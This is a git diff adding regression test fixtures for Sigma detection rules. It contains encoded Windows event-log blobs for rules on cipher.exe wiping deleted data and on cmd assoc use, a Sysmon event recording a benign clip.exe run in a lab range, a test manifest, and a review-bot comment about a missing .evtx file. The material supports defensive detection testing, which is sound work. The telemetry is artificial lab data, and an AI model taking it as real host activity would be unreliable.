diff --git a/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.evtx b/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.evtx new file mode 100644 index 0000000000000000000000000000000000000000..a7dd2dc9b98beecf66b8e3f9ed4417a5a1ab8f7e GIT binary patch literal 69632 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 Z(T<;5+rAdo;JA;BaHh@)BYIXVcd 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 seu{HD!~T{Px# literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.json b/regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.json new file mode 100644 index 000000000..fdf5019a2 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:33:00.990279Z" + } + }, + "EventRecordID": 11989935, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:33:00.989", + "ProcessGuid": "5AA13A44-09CC-68FD-4336-000000004002", + "ProcessId": 1060, + "Image": "C:\\Windows\\System32\\clip.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Clip - copies the data into clipboard", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "clip.exe", + "CommandLine": "clip", + "CurrentDirectory": "C:\\Users\\Administrator\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=F3F4BE6C6A42072CBB74D05E3EBE285FB24C56CF,MD5=61C8E9DEC5E3AEA798C2862CD4565CCA,SHA256=ABAF131EA0A608072574D7C77A6EE5175CA13E361DE18146A54A78CBD868BFF3,IMPHASH=FFEDF33A1AF6412E26F1F659C12D5FF7", + "ParentProcessGuid": "5AA13A44-08B2-68FD-2136-000000004002", + "ParentProcessId": 3204, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_clip_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_clip_execution/info.yml new file mode 100644 index 000000000..7d1d79487 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_clip_execution/info.yml @@ -0,0 +1,13 @@ +id: 4ea9d42e-437f-4c56-8173-bdd8cafd72be +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: ddeff553-5233-4ae9-bbab-d64d2bd634be + title: Data Copied To Clipboard Via Clip.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx 
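Review bot: the `path` under `regression_tests_info` points at `ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx`, but no hunk adding that .evtx appears in this region of the patch (the binary blob for `proc_creation_win_cipher_overwrite_deleted_data` is followed directly by this directory's .json), so confirm the binary is actually part of the commit; otherwise the job fails on a missing file rather than on a detection regression. Separately, the only entry is a positive test with `match_count: 1`; a second entry built from a benign process-creation event with `match_count: 0` would also guard against the rule becoming over-broad, which matters here because clip.exe is a stock Windows binary with routine interactive use.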
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx new file mode 100644 index 0000000000000000000000000000000000000000..df8accd0df83555b81967a5b40dac0c35bc38172 GIT binary patch literal 69632 zcmeHQYiwM_6+XM(-K?FgHx3C3)2h@JS6+D=Fs z1W_xX4^h+~{n7G=(zLW7g;rH1gpgWQrKM0vdGslSS|OpTh9h6G9bC1pyzND|3N7eSsuvsa@yC)_fLN6w1ubu zML-cy1QY>9KoL*`6ahs*5l{pa0YyL&m=S@_k-_$%v3=rZ_r?B?QW8jk=c+`WI`HkM zW)wVw2gdWg2Tnep?d|f2$kkDie}_f>5z4+JvIFj$Kts&+^U@4q9z&e`T#h*T`H$!S zdC#4055sLRCp|af`oA7Ya!F1cqn<2={gHRR9ez`g`E-sP`kCz~01W2yS?kE00)el+ z7G)Zj>GFSjZU4WX?0h{C4+Lac;Dg;`H7+#IZ%m)K<5(hf>dhxs96OGj&{wib9>pm$ z$j{Tu!qO=RWkAMc3fB+di0t)lJ`)eiAsLks+?>RXaG+U+;B89w%SKs`@1*p>WdMG9 zabAo6VYp1lIIhNJ5I$>hJr4Kvau@E6;lDxZ@NL3boh0x(FdhA*?AM61U@+ESs=WQ5Bjp1Ifa;bzusB>4~!l`)wOJV7P zN0!xy@g(#Vl*@2&nWv|nM?%tL%3`1K5@dt{sm2AX06)jCh{$J9fGie5#OMN)6qZlm z!quF;C!(?qw-2M-#(`r$aHrR>tO^149k}?WC-M4kEJdWl2Ge$U9Y6wDME&q%;9)JI zPTg>%!dHSW5a5YORau|{+LCEYQf09$w7VgYNoGnc^1;dqsbE^}Lm<~6Jo@fZX*b@O zjuDd*2kS2QOQpOTUhz(aBq4DM38%J9A*WVuw+2Y;8bf7eaX{q>Axu>&z@HmODmx`!FBWzk(wD+|}f$)%r ztplL4T%u)x<5kxhstP}0M!g+r_BUlU zavR*nfXFz|nFL0*IU2?FnB1Azf7`Xc{9F6ayCUxmKXmdha}B@V)Jj4@tgX%xSKGAT zvvn%rIuxES?YsWYz^A|Zn-6YzeB~P`PWnO#zk*Zt$^3MDiR$N?_6{Sq7w&8|Tk+36 znp*g^@eo=vM#{S%!x3R?8Af#7D7z69k83f5F%$_4`YJE{MH$~qP?S?Z%vI`O3@M`D z8qcpOdMkNpj>@}cHy8^_oMEopI=S-B^WD{DE+VY{Im4E)Q6!`?3Spf!5Gx2 zXj)Q0o4NEi!@*d%M3@fvXXi)F-alPl!C0gOKDKM>2c~Rxg0Uqf{IU&W)nrXO48Kw9 zcY~Kt;^XCWIrN69*n?vX{zt^+CsS(WC30e8B2v`sE+d7Ap+XU{f-$z6I?WcAqlONI z;W=}~2Ab(zYD2Tksb{RMUV1~*RX!M7W_=Yb?JmgLV`^4LJJ857O$D_t<9{pi5sX#Z zj>>8Jx=aeHprfp39IRNx*iNzOwYAQMk6X=Z^m4#By&P0RvzYGzq|dc%nVvZqV{404 zUg?Egl?fR^gT#RnhfI@5W0mz;FpWFl(;;j%$8``HJXTmdn!T7zXKQO%95t+1c$>cq 